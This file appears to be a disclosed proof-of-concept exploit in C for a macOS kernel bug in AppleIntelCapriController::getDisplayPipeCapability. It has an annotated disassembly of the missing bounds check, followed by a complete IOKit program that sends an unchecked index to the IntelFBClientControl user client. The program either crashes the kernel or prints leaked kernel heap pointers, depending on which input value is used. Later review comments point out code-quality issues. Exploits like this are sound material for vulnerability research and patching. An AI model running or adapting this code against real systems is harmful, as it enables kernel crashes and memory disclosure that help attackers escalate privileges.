
/*
AppleIntelCapriController::getDisplayPipeCapability reads an attacker-controlled dword value from a userclient structure
input buffer which it uses to index a small array of pointers to memory to copy back to userspace.
There is no bounds checking on the attacker supplied value allowing (with some heap grooming) the disclosure of arbitrary
kernel memory:
__text:000000000002ACE0 mov eax, [rbx] ; structure input buffer
__text:000000000002ACE2 mov rsi, [rdi+rax*8+0E48h] ; rax is controlled -> rsi read OOB
__text:000000000002ACEA cmp byte ptr [rsi+1DCh], 0 ; as long as this byte isn't NULL
__text:000000000002ACF1 jz short loc_2AD10
__text:000000000002ACF3 add rsi, 1E11h ; void * ; add this offset
__text:000000000002ACFA mov edx, 1D8h ; size_t
__text:000000000002ACFF mov rdi, r14 ; void *
__text:000000000002AD02 call _memcpy ; copy to structure output buffer, will be returned to userspace
Tested on MacOS 10.13 (17A365) on MacBookAir5,2
*/
// ianbeer
// build: clang -o capri_display_pipe capri_display_pipe.c -framework IOKit
#if 0
MacOS kernel memory disclosure due to lack of bounds checking in AppleIntelCapriController::getDisplayPipeCapability
AppleIntelCapriController::getDisplayPipeCapability reads an attacker-controlled dword value from a userclient structure
input buffer which it uses to index a small array of pointers to memory to copy back to userspace.
There is no bounds checking on the attacker supplied value allowing (with some heap grooming) the disclosure of arbitrary
kernel memory:
__text:000000000002ACE0 mov eax, [rbx] ; structure input buffer
__text:000000000002ACE2 mov rsi, [rdi+rax*8+0E48h] ; rax is controlled -> rsi read OOB
__text:000000000002ACEA cmp byte ptr [rsi+1DCh], 0 ; as long as this byte isn't NULL
__text:000000000002ACF1 jz short loc_2AD10
__text:000000000002ACF3 add rsi, 1E11h ; void * ; add this offset
__text:000000000002ACFA mov edx, 1D8h ; size_t
__text:000000000002ACFF mov rdi, r14 ; void *
__text:000000000002AD02 call _memcpy ; copy to structure output buffer, will be returned to userspace
Tested on MacOS 10.13 (17A365) on MacBookAir5,2
#endif
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <IOKit/IOKitLib.h>
int main(int argc, char** argv){
  /*
   * PoC driver for the getDisplayPipeCapability bounds-check issue described
   * in the header comment: open the IntelFBClientControl user client, send an
   * 8-byte structure input whose first qword is the unchecked index, and print
   * whatever the kernel copied back into the structure output buffer.
   * argc/argv are unused.
   */
  kern_return_t err;

  // Look the user client up by class name. IOServiceGetMatchingService takes
  // ownership of the matching dictionary, so no CFRelease is needed here.
  io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IntelFBClientControl"));

  if (service == IO_OBJECT_NULL){
    printf("unable to find service\n");
    // NOTE(review): exits with status 0 on this failure path, so a harness
    // cannot distinguish "service absent" from a completed run.
    return 0;
  }

  // Open user-client type 0 on the service.
  // NOTE(review): `service` is never released (IOObjectRelease) and `conn`
  // is never closed (IOServiceClose). Harmless for a one-shot PoC; a port
  // leak in anything longer-lived.
  io_connect_t conn = MACH_PORT_NULL;
  err = IOServiceOpen(service, mach_task_self(), 0, &conn);
  if (err != KERN_SUCCESS){
    printf("unable to get user client connection\n");
    return 0; // same status-0-on-failure caveat as above
  }

  // No scalar inputs: the array is left uninitialized, but inputScalarCnt is 0
  // so the kernel never reads from it.
  uint64_t inputScalar[16];
  uint64_t inputScalarCnt = 0;

  // Structure input: only the first 8 bytes are sent (inputStructCnt = 8); the
  // rest of the 4096-byte buffer is unused. That first qword is the
  // "attacker-controlled dword" the header comment describes being used as an
  // array index with no bounds check.
  char inputStruct[4096];
  size_t inputStructCnt = 8;
  // NOTE(review): a char array carries no 8-byte alignment guarantee, so this
  // cast-and-store is technically a misaligned access; memcpy of a uint64_t
  // would be the strictly conforming form.
  *(uint64_t*)inputStruct = 0x12345678; // crash
  //*(uint64_t*)inputStruct = 0x37; // disclose kernel heap memory

  // Output scalars: none expected (count 0).
  uint64_t outputScalar[16];
  uint32_t outputScalarCnt = 0;

  // Structure output: the capacity is passed in and the kernel overwrites
  // outputStructCnt with the number of bytes it actually copied back.
  char outputStruct[4096];
  size_t outputStructCnt = 4096;

  // External method selector 0x710 is the getDisplayPipeCapability call per
  // the header comment; the selector-to-method table is not shown in this file.
  err = IOConnectCallMethod(
    conn,
    0x710,
    inputScalar,
    inputScalarCnt,
    inputStruct,
    inputStructCnt,
    outputScalar,
    &outputScalarCnt,
    outputStruct,
    &outputStructCnt);

  // NOTE(review): `err` is assigned above but never tested. A failed call is
  // only noticed indirectly, if outputStructCnt stays at or below 20; check
  // err against KERN_SUCCESS before interpreting the output buffer.
  if (outputStructCnt > 20) {
    // Treat the returned bytes as 8-byte values starting at offset 7. Why 7
    // is not explained in the file — presumably it lines the 0x1D8-byte copy
    // taken from rsi+0x1E11 (see header) up on pointer boundaries; confirm
    // against the disassembly.
    int n_leaked_ptrs = (outputStructCnt-7)/8;
    // NOTE(review): outputStruct+7 is not 8-byte aligned, so reading through
    // a uint64_t* is both a misaligned access and an aliasing violation;
    // memcpy each value into a uint64_t to stay within defined behavior.
    uint64_t* ptrs = (uint64_t*) (outputStruct+7);
    for (int i = 0; i < n_leaked_ptrs; i++) {
      // %llx assumes uint64_t is unsigned long long (true on macOS);
      // PRIx64 from <inttypes.h> is the portable specifier.
      printf("%016llx\n", ptrs[i]);
    }
  }
  return 0;
}